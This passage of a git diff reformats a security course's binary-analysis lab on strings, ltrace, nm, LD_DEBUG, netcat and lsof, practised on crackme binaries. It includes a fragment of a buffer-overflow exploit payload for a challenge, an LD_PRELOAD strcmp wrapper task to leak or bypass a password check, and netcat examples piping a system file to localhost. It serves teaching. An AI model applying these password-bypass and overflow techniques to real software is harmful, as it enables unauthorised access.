Sections](https://refspecs.linuxfoundation.org/LSB_3.0.0/LSB-Core-generic/LSB-Core-generic/specialsections.html) -* [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) -* [strip manpage](https://sourceware.org/binutils/docs/binutils/strip.html) -* [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) -* [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) +- [ELF-32](http://www.skyfree.org/linux/references/ELF_Format.pdf) +- [ELF-64](http://ftp.openwatcom.org/devel/docs/elf-64-gen.pdf) specification +- [list](https://elinux.org/Executable_and_Linkable_Format_(ELF)) of all ELF specification formats +- [ARM](https://developer.arm.com/documentation/ihi0044/e/) specification +- [Position Independent Code](https://wiki.gentoo.org/wiki/Hardened/Introduction_to_Position_Independent_Code) +- [Creating shared objects](https://www.ibm.com/developerworks/library/l-shobj/) +- [GNU_RELRO](https://www.airs.com/blog/archives/189) +- [GNU_STACK](https://guru.multimedia.cx/pt_gnu_stack/) +- [ELF Special Sections](https://refspecs.linuxfoundation.org/LSB_3.0.0/LSB-Core-generic/LSB-Core-generic/specialsections.html) +- [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) +- [strip manpage](https://sourceware.org/binutils/docs/binutils/strip.html) +- [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) +- [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) diff --git a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py index 870f777..fd8d35b 100755 --- a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py +++ b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py @@ -4,7 +4,7 @@ PORT = 9999 MESSAGE = "anaaremere" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.connect(('127.0.0.1', PORT)) +s.connect(("127.0.0.1", PORT)) request = MESSAGE print(f"sending '{request}'") diff --git a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py index 1acdaf6..022248e 100755 --- a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py +++ b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py @@ -4,14 +4,14 @@ PORT = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) -s.bind(('', PORT)) +s.bind(("", PORT)) s.listen(1) conn, addr = s.accept() while True: request = conn.recv(1024) if not request: - break + break reply = request.upper() conn.sendall(reply) diff --git a/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py b/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py index e222e8e..a6c0713 100755 --- a/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py +++ b/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py @@ -17,7 +17,7 @@ offset = 0x40 + 8 - 11 # Address of function `nononono`. Use `nm ./detective` to get it. -addr = 0x00000000004006d7 +addr = 0x00000000004006D7 payload += offset * b"A" + p64(addr) diff --git a/chapters/binary-analysis/exploration-tools/reading/README.md b/chapters/binary-analysis/exploration-tools/reading/README.md index 496bf84..69122e7 100644 --- a/chapters/binary-analysis/exploration-tools/reading/README.md +++ b/chapters/binary-analysis/exploration-tools/reading/README.md @@ -1,44 +1,23 @@ ---- -linkTitle: Exploration Tools -type: docs -weight: 10 ---- - # Exploration Tools -
- Table of contents - - * [Tutorials](#tutorials) - * [01. Tutorial - Poor man's technique: strings](#01-tutorial---poor-mans-technique-strings) - * [02. Tutorial - Execution tracing (ltrace and strace)](#02-tutorial---execution-tracing-ltrace-and-strace) - * [03. Tutorial - Symbols: nm](#03-tutorial---symbols-nm) - * [04. Tutorial - Library dependencies](#04-tutorial---library-dependencies) - * [05. Tutorial - Network: netstat and netcat](#05-tutorial---network-netstat-and-netcat) - * [06. Tutorial - Open files](#06-tutorial---open-files) - * [Challenges](#challenges) - * [07. Challenge - Perfect Answer](#07-challenge---perfect-answer) - * [08. Challenge - Lots of strings](#08-challenge---lots-of-strings) - * [09. Challenge - Sleepy cats](#09-challenge---sleepy-cats) - * [10. Challenge - Hidden](#10-challenge---hidden) - * [11. Challenge - Detective](#11-challenge---detective) - * [Extra](#extra) - * [Further pwning](#further-pwning) - * [Further Reading](#further-reading) - -
- ## Tutorials + When faced with a binary with no source or parts of the source missing you can infer some of its functionalities based upon some basic reconnaissance techniques using various tools. -### 01. Tutorial - Poor man's technique: strings -The simplest recon technique is to dump the ASCII (or Unicode) text from a binary. It doesn't offer any guarantees but sometimes you can get a lot of useful information out of it. ->By default, when applied to a binary it only scans the data section. To obtain information such as the compiler version used in producing the binary use: -``` +### 01. Tutorial - Poor Man's Technique: strings + +The simplest recon technique is to dump the ASCII (or Unicode) text from a binary. +It doesn't offer any guarantees but sometimes you can get a lot of useful information out of it. + +By default, when applied to a binary it only scans the data section. +To obtain information such as the compiler version used in producing the binary use: + +```text strings -a crackme1 ``` -Let's illustrate how strings can be useful in a simple context. Try out the [crackme1](./activities/01-tutorial-strings/src) binary: +Let's illustrate how strings can be useful in a simple context. +Try out the [crackme1](./activities/01-tutorial-strings/src) binary: ```c #include @@ -76,30 +55,41 @@ int main() } ``` -The password has been redacted from the listing but you can retrieve it with `strings`. Try it out! +The password has been redacted from the listing but you can retrieve it with `strings`. +Try it out! -### 02. Tutorial - Execution tracing (ltrace and strace) +### 02. Tutorial - Execution Tracing (ltrace and strace) -[ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) is an utility that can list library function calls or [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) made by a program. [strace](https://man7.org/linux/man-pages/man1/strace.1.html) is similar, but only lists syscalls. A syscall is a service exposed by the kernel itself. +[ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) is an utility that can list library function calls or [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) made by a program. +[strace](https://man7.org/linux/man-pages/man1/strace.1.html) is similar, but only lists syscalls. +A syscall is a service exposed by the kernel itself. -The way they work is with the aid of a special syscall, called [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html). This single syscall forms the basis for most of the functionality provided by `ltrace`, `strace`, `gdb` and similar tools that debug programs. It can receive up to 4 arguments: the operation, the PID to act on, the address to read/write and the data to write. The functionality exposed by `ptrace()` is massive, but think of any functionality you've seen in a debugger: +The way they work is with the aid of a special syscall, called [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html). +This single syscall forms the basis for most of the functionality provided by `ltrace`, `strace`, `gdb` and similar tools that debug programs. +It can receive up to 4 arguments: the operation, the PID to act on, the address to read/write and the data to write. +The functionality exposed by `ptrace()` is massive, but think of any functionality you've seen in a debugger: -* attach/detach to/from a process -* set breakpoints -* continue a stopped program -* read/write registers -* act on signals -* register syscalls +- attach/detach to/from a process +- set breakpoints +- continue a stopped program +- read/write registers +- act on signals +- register syscalls -`strace` provides some pretty printing strictly concerning the syscalls of the traced process. However, `ltrace` provides further functionality and gathers information about all library calls. Here's how `ltrace` does its magic: +`strace` provides some pretty printing strictly concerning the syscalls of the traced process. +However, `ltrace` provides further functionality and gathers information about all library calls. +Here's how `ltrace` does its magic: -* it reads the tracee memory and parses it in order to find out about loaded symbols -* it makes a copy of the binary code pertaining to a symbol using a `PTRACE_PEEKTEXT` directive of `ptrace()` -* it injects a breakpoint using a `PTRACE_POKETEXT` directive of `ptrace()` -* it listens for a `SIGTRAP` which will be generated when the breakpoint is hit -* when the breakpoint is hit, ltrace can examine the stack of the tracee and print information such as function name, parameters, return codes, etc. +- it reads the tracee memory and parses it in order to find out about loaded symbols +- it makes a copy of the binary code pertaining to a symbol using a `PTRACE_PEEKTEXT` directive of `ptrace()` +- it injects a breakpoint using a `PTRACE_POKETEXT` directive of `ptrace()` +- it listens for a `SIGTRAP` which will be generated when the breakpoint is hit +- when the breakpoint is hit, ltrace can examine the stack of the tracee and print information such as function name, parameters, return codes, etc. -Let's try the next `crackme`. If we remove `my_strcmp` from the previous crackme you can solve it even without `strings` because `strcmp` is called from `libc.so`. You can use `ltrace` and see what functions are used and check for their given parameters. Try it out on the second `crackme` where `strings` does not help ([crackme2](./activities/02-tutorial-execution-tracing/src)): +Let's try the next `crackme`. +If we remove `my_strcmp` from the previous crackme you can solve it even without `strings` because `strcmp` is called from `libc.so`. +You can use `ltrace` and see what functions are used and check for their given parameters. +Try it out on the second `crackme` where `strings` does not help ([crackme2](./activities/02-tutorial-execution-tracing/src)): ```c #include @@ -133,10 +123,15 @@ int main() ### 03. Tutorial - Symbols: nm -Symbols are basically tags/labels, either for functions or for variables. If you enable debugging symbols you will get information on all the variables defined but normally symbols are only defined for functions and global variables. When stripping binaries even these can be deleted without any effect on the binary behavior. Dynamic symbols, however, have to remain so that the linker knows what functions to import: -``` +Symbols are basically tags/labels, either for functions or for variables. +If you enable debugging symbols you will get information on all the variables defined but normally symbols are only defined for functions and global variables. +When stripping binaries even these can be deleted without any effect on the binary behavior. +Dynamic symbols, however, have to remain so that the linker knows what functions to import: + +```console $ file xy xy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped + $ nm xy 0804a020 B __bss_start 0804a018 D __data_start @@ -173,7 +168,9 @@ $ nm -D xy U __libc_start_main U puts ``` -Let's take a look at another crackme that combines crackme1 and crackme2. What would you do if you couldn't use neither strings nor ltrace to get anything useful? + +Let's take a look at another crackme that combines crackme1 and crackme2. +What would you do if you couldn't use neither strings nor ltrace to get anything useful? ```c #include @@ -200,7 +197,6 @@ char *deobf(char *s) ??????????????????????????? } - int main() { char buf[1000]; @@ -219,9 +215,11 @@ int main() return 0; } ``` -In [crackme3](./activities/03-tutorial-symbols/src), deobfuscation is done before the password is read. Since the `correct_pass` has an associated symbol that is stored at a known location you can obtain the address and peer into it at runtime: -``` +In [crackme3](./activities/03-tutorial-symbols/src), deobfuscation is done before the password is read. +Since the `correct_pass` has an associated symbol that is stored at a known location you can obtain the address and peer into it at runtime: + +```console $ nm crackme3 | grep pass 0804a02c D correct_pass $ gdb -n ./crackme3 @@ -235,11 +233,14 @@ Program received signal SIGINT, Interrupt. 0x804a02c : "JWxb7gE2pjiY3gRG8U" ``` -The above `x/s 0x0804a02c` command in GDB is used for printing the string starting from address `0x0804a02c`. `x` stands for examine memory and `s` stands for string format. In short it dumps memory in string format starting from the address passed as argument. You may print multiple strings by prefixing `s` with a number, for example `x/20s 0x0804a02c`. +The above `x/s 0x0804a02c` command in GDB is used for printing the string starting from address `0x0804a02c`. +`x` stands for examine memory and `s` stands for string format. +In short it dumps memory in string format starting from the address passed as argument. +You may print multiple strings by prefixing `s` with a number, for example `x/20s 0x0804a02c`. For other programs (that are not stripped) you can even get a hint as to what they do using solely `nm`: -``` +```console $ nm mystery_binary ..... 0000000000402bef T drop_privs(char const*) @@ -256,19 +257,27 @@ $ nm mystery_binary 0000000000402255 T urldecode(std::string const&) ..... ``` + **Note:** In this case the signatures are also decoded because the binary was compiled from C++ source code. -Dealing with stripped binaries (or worse, statically linked binaries that have been stripped) is harder but can still be done. We'll see how in a future lab. +Dealing with stripped binaries (or worse, statically linked binaries that have been stripped) is harder but can still be done. +We'll see how in a future lab. -### 04. Tutorial - Library dependencies +### 04. Tutorial - Library Dependencies -Most programs you will see make use of existing functionality. You don't want to always reimplement string functions or file functions. Therefore, most programs use dynamic libraries. These shared objects, as they are called alternatively, allow you to have a smaller program and also allow multiple programs to use a single copy of the code within the library. But how does that actually work? +Most programs you will see make use of existing functionality. +You don't want to always reimplement string functions or file functions. +Therefore, most programs use dynamic libraries. +These shared objects, as they are called alternatively, allow you to have a smaller program and also allow multiple programs to use a single copy of the code within the library. +But how does that actually work? -What makes all of these programs work is the Linux dynamic linker/loader. This is a statically linked helper program that resolves symbol names from shared objects at runtime. We can use the dynamic linker to gather information about an executable. +What makes all of these programs work is the Linux dynamic linker/loader. +This is a statically linked helper program that resolves symbol names from shared objects at runtime. +We can use the dynamic linker to gather information about an executable. The first and most common thing to do is see what libraries the executable loads, with the [ldd](https://man7.org/linux/man-pages/man1/ldd.1.html) utility: -``` +```console $ ldd /bin/ls linux-vdso.so.1 (0x00007ffff13fe000) librt.so.1 => /lib64/librt.so.1 (0x00007fc9b4893000) @@ -278,9 +287,11 @@ $ ldd /bin/ls libattr.so.1 => /lib64/libattr.so.1 (0x00007fc9b3eb8000) /lib64/ld-linux-x86-64.so.2 (0x00007fc9b4a9b000) ``` -We see that for each dependency in the executable, `ldd` lists where it is found on the filesystem and where it is loaded in the process memory space. Alternatively, you can achieve the same result with the `LD_TRACE_LOADED_OBJECTS` environment variable, or with the dynamic loader itself: -``` +We see that for each dependency in the executable, `ldd` lists where it is found on the filesystem and where it is loaded in the process memory space. +Alternatively, you can achieve the same result with the `LD_TRACE_LOADED_OBJECTS` environment variable, or with the dynamic loader itself: + +```console $ LD_TRACE_LOADED_OBJECTS=whatever /bin/ls linux-vdso.so.1 (0x00007fff325fe000) librt.so.1 => /lib64/librt.so.1 (0x00007f1845386000) @@ -298,27 +309,34 @@ $ /lib/ld-linux-x86-64.so.2 --list /bin/ls libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f18a0001000) /lib64/ld-linux-x86-64.so.2 => /lib/ld-linux-x86-64.so.2 (0x00007f18a0c44000) ``` ->When using the loader directly, make sure the loader and the executable are compiled for the same platform (e.g. they are both 64-bit or 32-bit). ->You may find out more information about dynamic linker/loader variables in its man page. Issue the command -``` +When using the loader directly, make sure the loader and the executable are compiled for the same platform (e.g. they are both 64-bit or 32-bit). +You may find out more information about dynamic linker/loader variables in its man page. +Issue the command: + +```console man ld-linux.so ``` ->and search for the LD_ string to find variables information. -`ldd` shows us **which** libraries are loaded, but it's not any clearer how the loader knows **where** to load them from. First of all, the loader checks every dependency for a slash character. If it finds such a dependency it loads the library from that path, whether it is a relative of absolute path. But it is not the case in our example. For dependencies without slashes, the search order is as follows: +and search for the `LD_` string to find variables information. + +`ldd` shows us **which** libraries are loaded, but it's not any clearer how the loader knows **where** to load them from. +First of all, the loader checks every dependency for a slash character. +If it finds such a dependency it loads the library from that path, whether it is a relative of absolute path. +But it is not the case in our example. +For dependencies without slashes, the search order is as follows: -* `DT_RPATH` attribute in the `.dynamic` section of the executable, provided there is no `DT_RUNPATH`; this is deprecated -* `LD_LIBRARY_PATH` environment variable, which is similar to PATH; does not work with SUID/SGID programs -* `DT_RUNPATH` attribute in the .dynamic section of the executable -* `/etc/ld.so.cache`, generated by [ldconfig](https://man7.org/linux/man-pages/man8/ldconfig.8.html) -* `/lib` and then `/usr/lib` +- `DT_RPATH` attribute in the `.dynamic` section of the executable, provided there is no `DT_RUNPATH`; this is deprecated +- `LD_LIBRARY_PATH` environment variable, which is similar to `PATH`; does not work with `setuid` / `setgid` programs +- `DT_RUNPATH` attribute in the `.dynamic` section of the executable +- `/etc/ld.so.cache`, generated by [ldconfig](https://man7.org/linux/man-pages/man8/ldconfig.8.html) +- `/lib` and then `/usr/lib` The last two options are skipped if the program was linked with the `-z nodeflib` option. Now let's see exactly where the loader finds the libraries: -``` +```console $ LD_DEBUG=libs /bin/ls 11451: find library=librt.so.1 [0]; searching 11451: search cache=/etc/ld.so.cache @@ -340,13 +358,20 @@ $ LD_DEBUG=libs /bin/ls 11451: search cache=/etc/ld.so.cache 11451: trying file=/lib64/libattr.so.1 ``` -The `LD_DEBUG` environment variable makes the dynamic loader be verbose about what it's doing. Try `LD_DEBUG=help` if you're curious about what else you can find out. We can see in the output listed above that all the libraries are found via the loader cache. The number at the beginning of each line is ls's PID. -And now we can discuss **how** the loader resolves symbols after it has found the libraries containing them. While variables are resolved when the library is opened, that is not the case for function references. When dealing with functions, the Linux dynamic loader uses something called lazy binding, which means that a function symbol in the library is not resolved until the very first call to it. Think about why this difference exists. +The `LD_DEBUG` environment variable makes the dynamic loader be verbose about what it's doing. +Try `LD_DEBUG=help` if you're curious about what else you can find out. +We can see in the output listed above that all the libraries are found via the loader cache. +The number at the beginning of each line is ls's PID. + +And now we can discuss **how** the loader resolves symbols after it has found the libraries containing them. +While variables are resolved when the library is opened, that is not the case for function references. +When dealing with functions, the Linux dynamic loader uses something called lazy binding, which means that a function symbol in the library is not resolved until the very first call to it. +Think about why this difference exists. You can see the way lazy binding behaves: -``` +```console $ LD_DEBUG=symbols,bindings ./crackme2 ... 11480: initialize program: ./crackme2 @@ -374,37 +399,50 @@ Nope! 11480: ``` -As you can see, functions like `puts()`, `fgets()`, `strlen()` and `strcmp()` are not actually resolved until the first call to them is made. Make the loader resolve all the symbols at startup. (Hint: [ld-linux](https://man7.org/linux/man-pages/man8/ld-linux.8.html)). +As you can see, functions like `puts()`, `fgets()`, `strlen()` and `strcmp()` are not actually resolved until the first call to them is made. +Make the loader resolve all the symbols at startup. +(Hint: [ld-linux](https://man7.org/linux/man-pages/man8/ld-linux.8.html)). -**Library Wrapper Task** +#### Library Wrapper Task -You've previously solved `crackme2` with the help of the `ltrace`. Check out the files from [04-tutorial-library-dependencies](./activities/04-tutorial-library-dependencies/src). The folder consists of a `Makefile` and a C source code file reimplementing the `strcmp()` function (library wrapper). The `strcmp.c` implementation uses `LD_PRELOAD` to wrap the actual `strcmp()` call to our own. +You've previously solved `crackme2` with the help of the `ltrace`. +Check out the files from [04-tutorial-library-dependencies](./activities/04-tutorial-library-dependencies/src). +The folder consists of a `Makefile` and a C source code file reimplementing the `strcmp()` function (library wrapper). +The `strcmp.c` implementation uses `LD_PRELOAD` to wrap the actual `strcmp()` call to our own. -In order to see how that works, we need to create a shared library and pass it as an argument to `LD_PRELOAD`. The `Makefile` already takes care of this. To build and run the entire thing, simply run: +In order to see how that works, we need to create a shared library and pass it as an argument to `LD_PRELOAD`. +The `Makefile` already takes care of this. +To build and run the entire thing, simply run: -``` +```console make run ``` This will build the shared library file (`strcmp.so`) and run the `crackme2` executable under `LD_PRELOAD`. -Our goal is to use the `strcmp()` wrapper to alter the program behavior. We have two ways to make the `crackme2` program behave our way: +Our goal is to use the `strcmp()` wrapper to alter the program behavior. +We have two ways to make the `crackme2` program behave our way: 1. Leak the password in the `strcmp()` wrapper. 1. Pass the check regardless of what password we provide. -Modify the `strcmp()` function in the `strcmp.c` source code file to alter the the `crackme2` program behavior in each of the two ways shown above. To test it, use the `Makefile`: +Modify the `strcmp()` function in the `strcmp.c` source code file to alter the `crackme2` program behavior in each of the two ways shown above. +To test it, use the `Makefile`: -``` +```console make run ``` ### 05. Tutorial - Network: netstat and netcat -Services running on remote machines offer a gateway to those particular machines. Whether it's improper handling of the data received from clients, or a flaw in the protocol used between server and clients, certain privileges can be obtained if care is not taken. We'll explore some tools and approaches to analyzing remote services. To follow along, use the server and client programs from [05-tutorial-network-netstat-netcat](./activities/05-tutorial-network-netstat-netcat/src). +Services running on remote machines offer a gateway to those particular machines. +Whether it's improper handling of the data received from clients, or a flaw in the protocol used between server and clients, certain privileges can be obtained if care is not taken. +We'll explore some tools and approaches to analyzing remote services. +To follow along, use the server and client programs from [05-tutorial-network-netstat-netcat](./activities/05-tutorial-network-netstat-netcat/src). First of all, start the server: -``` + +```console $ ./server Welcome to the awesome server. Valid commands are: @@ -412,11 +450,12 @@ quit status ``` -Running any of them at this point doesn't offer much help. We'll come back to this later. +Running any of them at this point doesn't offer much help. +We'll come back to this later. The most straightforward way to see what a server does is the [netstat](https://man7.org/linux/man-pages/man8/netstat.8.html) utility. -``` +```console $ netstat -tlpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) @@ -433,11 +472,16 @@ tcp 0 0 0.0.0.0:44790 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp6 0 0 :::631 :::* LISTEN - ``` -Here we're looking at all the programs that are listening (`-l`) on a TCP port (`-t`). We're also telling netcat not to resolve hosts (`-n`) and to show the process that is listening (`-p`). We can see that our server is listening on port 31337. Let's keep that in mind and see how the client behaves. -``` +Here we're looking at all the programs that are listening (`-l`) on a TCP port (`-t`). +We're also telling `netcat` not to resolve hosts (`-n`) and to show the process that is listening (`-p`). +We can see that our server is listening on port `31337`. +Let's keep that in mind and see how the client behaves: + +```console $ ./client Usage: ./client + $ ./client the_laughing_man localhost 31337 Welcome to the awesome server. Valid commands are: @@ -463,11 +507,15 @@ Not enough minerals! Enter a command (or 'quit' to exit): ``` -So we can do anything except the privileged command `infoclient`. Running `status` on the server yields no information. What can we do now? +So we can do anything except the privileged command `infoclient`. +Running `status` on the server yields no information. +What can we do now? -We can see what the server and client are exchanging at an application level by capturing the traffic with the [tcpdump](https://man7.org/linux/man-pages/man1/tcpdump.1.html) utility. Start tcpdump, the server and then the client, and run the commands again. When you're done, stop tcpdump with Ctrl+C. +We can see what the server and client are exchanging at an application level by capturing the traffic with the [tcpdump](https://man7.org/linux/man-pages/man1/tcpdump.1.html) utility. +Start tcpdump, the server and then the client, and run the commands again. +When you're done, stop tcpdump with Ctrl+C. -``` +```console # tcpdump -i any -w crackme5.pcap 'port 31337' tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes ^C21 packets captured @@ -490,9 +538,10 @@ We can use it instead of the "official" client and see what happens when we craf Go ahead! Start the server again and a normal client. ->Connect to the server using `netcat`. Then send out the required string through the `netcat` connection with true as the second parameter and see if you can find out anything about the normal client. +Connect to the server using `netcat`. +Then send out the required string through the `netcat` connection with true as the second parameter and see if you can find out anything about the normal client. -``` +```console # netcat localhost 31337 Welcome to the awesome server. Valid commands are: @@ -502,17 +551,21 @@ infoclient [ADMIN access required] sendmsg ``` -**Doing it in Python** +#### Doing it in Python -You can create a sever and a client in Python only. We can use the `server.py` and `client.py` scripts. Check them out first. +You can create a sever and a client in Python only. +We can use the `server.py` and `client.py` scripts. +Check them out first. Then run the server by using: -``` + +```console python server.py ``` + It now accepts connections on TCP port 9999 as you can see by using `netstat`: -``` +```console $ netstat -tlpn [...] Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name @@ -522,32 +575,33 @@ tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN Now you can test it using the Python client: -``` +```console $ python client.py sending 'anaaremere' received 'ANAAREMERE' ``` -We can do the same using netcat as the client: -``` +We can do the same using `netcat` as the client: + +```console $ nc localhost 9999 anaaremere ANAAREMERE ``` -**Doing it Only with netcat** +#### Doing it Only with netcat -We can still simulate a network connection using netcat only, both for starting the server and for runing the client. +We can still simulate a network connection using `netcat` only, both for starting the server and for running the client. Start the server with: -``` -$ nc -l -p 4444 +```console +nc -l -p 4444 ``` Now run the client and send messages by writing them to standard input: -``` +```console $ nc localhost 4444 aaaaa bbbbb @@ -555,57 +609,64 @@ bbbbb Messages you write to the client and up in the server. -This goes both ways: if you write messages on the server they end up in the client. Try that. +This goes both ways: if you write messages on the server they end up in the client. +Try that. -If you want to send a large chunk of data you can redirect a file. Start the server again: +If you want to send a large chunk of data you can redirect a file. +Start the server again: -``` -$ nc -l -p 4444 +```console +nc -l -p 4444 ``` and now send the file to it: +```console +cat /etc/services | nc localhost 4444 ``` -$ cat /etc/services | nc localhost 4444 -``` + It's now on the server side. -You can also do it with UDP, instead of TCP by using the `-u` flag both for the server and the client. Start the server using: +You can also do it with UDP, instead of TCP by using the `-u` flag both for the server and the client. +Start the server using: +```console +nc -u -l -p 4444 ``` -$ nc -u -l -p 4444 -``` + And run the client using: +```console +cat /etc/services | nc -u localhost 4444 ``` -$ cat /etc/services | nc -u localhost 4444 -``` -That's how we use netcat (the network swiss army knife). ->You can also look into [socat](https://linux.die.net/man/1/socat) for a complex tool on dealing with sockets. +That's how we use `netcat` (the network swiss army knife). + +You can also look into [`socat`](https://linux.die.net/man/1/socat) for a complex tool on dealing with sockets. ### 06. Tutorial - Open files Let's remember how files and programs relate in Linux. - -![Files](assets/files.png) +![Files](../media/files.png) Let's also remember that, in Linux, `file` can mean one of many things: -* regular file -* directory -* block device -* character device -* named pipe -* symbolic or hard link -* socket +- regular file +- directory +- block device +- character device +- named pipe +- symbolic or hard link +- socket -Let's look at the previous server from `crackme5`. Start it up once again. +Let's look at the previous server from `crackme5`. +Start it up once again. -While previously we've used netstat to gather information about it, that was by no means the only solution. [lsof](https://linux.die.net/man/8/lsof) is a tool that can show us what files a process has opened: +While previously we've used netstat to gather information about it, that was by no means the only solution. +[lsof](https://linux.die.net/man/8/lsof) is a tool that can show us what files a process has opened: -``` +```console $ lsof -c server COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME server 9678 amadan cwd DIR 8,6 4096 1482770 /home/amadan/projects/sss/session01/crackmes/crackme5 @@ -622,19 +683,19 @@ server 9678 amadan 3u IPv4 821076 0t0 TCP *:31337 (LISTEN) We can see the standard file descriptors found in any process, as well as our socket. - * The `FD` column shows the file descriptor entry for a file, or a role in case of special files. We notice the current working directory (`cwd`), the root directory (`rtd`), the current executable (`txt`), some memory mapped files (`mem`) and the file descriptors (0-3). For normal file descriptors, `r` means read access, `w` means write access and `u` means both. - - * The `TYPE` column shows whether we're dealing with a directory (`DIR`), a regular file (`REG`), a character device (`CHR`), a socket (`IPv4`) or other type of file. - - * The `NODE` column shows the inode of the file, or a class marker as is the case for the socket. +- The `FD` column shows the file descriptor entry for a file, or a role in case of special files. + We notice the current working directory (`cwd`), the root directory (`rtd`), the current executable (`txt`), some memory mapped files (`mem`) and the file descriptors (0-3). + For normal file descriptors, `r` means read access, `w` means write access and `u` means both. +- The `TYPE` column shows whether we're dealing with a directory (`DIR`), a regular file (`REG`), a character device (`CHR`), a socket (`IPv4`) or other type of file. +- The `NODE` column shows the inode of the file, or a class marker as is the case for the socket. +- The `NAME` column shows the path to the file, or the bound address and port for a socket. - * The `NAME` column shows the path to the file, or the bound address and port for a socket. - -We've left out some details since they are not relevant for our purposes. Feel free to read the manual page. +We've left out some details since they are not relevant for our purposes. +Feel free to read the manual page. You could also get some hint that there is an open socket by looking into the `/proc` virtual filesystem: -``` +```console $ ls -l /proc/`pidof server`/fd total 0 lrwx------ 1 amadan amadan 64 Jun 15 22:04 0 -> /dev/pts/2 @@ -644,16 +705,17 @@ lrwx------ 1 amadan amadan 64 Jun 15 22:04 3 -> socket:[883625] ``` We'll be using [crackme6](./activities/06-tutorial-open-files/src) for the next part of this section. -Try the conventional means of `strings` and `ltrace` on it. Then run it normally. +Try the conventional means of `strings` and `ltrace` on it. +Then run it normally: -``` +```console $ ./crackme6 Type 'start' to begin authentication test ``` Before complying to what the program tells us, let's use `lsof` to see what we can find out: -``` +```console $ lsof -c crackme6 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME crackme6 10466 amadan cwd DIR 8,6 4096 1482769 /home/amadan/projects/sss/session01/06-tutorial-open-files @@ -669,24 +731,28 @@ crackme6 10466 amadan 3w FIFO 0,32 0t0 988920 /tmp/crackme6.fifo crackme6 10466 amadan 4r FIFO 0,32 0t0 988920 /tmp/crackme6.fifo ``` -There seems to be a named pipe used by the executable. Let's look at it: +There seems to be a named pipe used by the executable. +Let's look at it: -``` -$ more /tmp/crackme6.fifo +```console +more /tmp/crackme6.fifo ``` -Now go back again at the `crackme6` console and type `start`. If you see the message that the authentication test has succeeded, quit and try again. If you do not see the message, kill the `crackme6` process, look at the more command output and then delete the pipe file. Now try the password. +Now go back again at the `crackme6` console and type `start`. +If you see the message that the authentication test has succeeded, quit and try again. +If you do not see the message, kill the `crackme6` process, look at the more command output and then delete the pipe file. +Now try the password. -**Misc** +#### Misc There are other sources of information available about running processes if you prefer to do things by hand such as: -* `/proc//environ`: all environment variables given when the process was started -* `/proc//fd`: opened file descriptors. -* `/proc//mem`: address space layout -* `/proc//cwd`: symlink to working directory -* `/proc//exe`: symlink to binary image -* `/proc//cmdline`: complete program commandline, with arguments +- `/proc//environ`: all environment variables given when the process was started +- `/proc//fd`: opened file descriptors. +- `/proc//mem`: address space layout +- `/proc//cwd`: symlink to working directory +- `/proc//exe`: symlink to binary image +- `/proc//cmdline`: complete program commandline, with arguments ## Challenges @@ -704,18 +770,20 @@ Use the [lots_of_strings](./activities/08-challenge-lots-of-strings/src) binary. Can you find the **password**? ->Hint: use the tools presented in the tutorials. +Hint: use the tools presented in the tutorials. ### 09. Challenge - Sleepy cats For this task use the [sleepy](./activities/09-challenge-sleepy-cats/src) binary. -The `sleep()` function takes too much. Ain't nobody got time for that. We want the flag NOW!! +The `sleep()` function takes too much. +Ain't nobody got time for that. +We want the flag NOW! Modify the binary in order to get the flag. -> To edit a binary, you can use [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) or `Bless`. -> We strongly encourage you to use `Bless` +To edit a binary, you can use [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) or `Bless`. +We strongly encourage you to use `Bless` ### 10. Challenge - Hidden @@ -723,40 +791,48 @@ For this challenge use the [hidden](./activities/10-challenge-hidden/src) binary Can you find the hidden flag? ->You could use `ltrace` and `strace` to find the flag. But try to make it give you the flag by simply altering the environment, do not attach to the executable. - +You could use `ltrace` and `strace` to find the flag. +But try to make it give you the flag by simply altering the environment, do not attach to the executable. ### 11. Challenge - Detective -This challenge runs remotely at 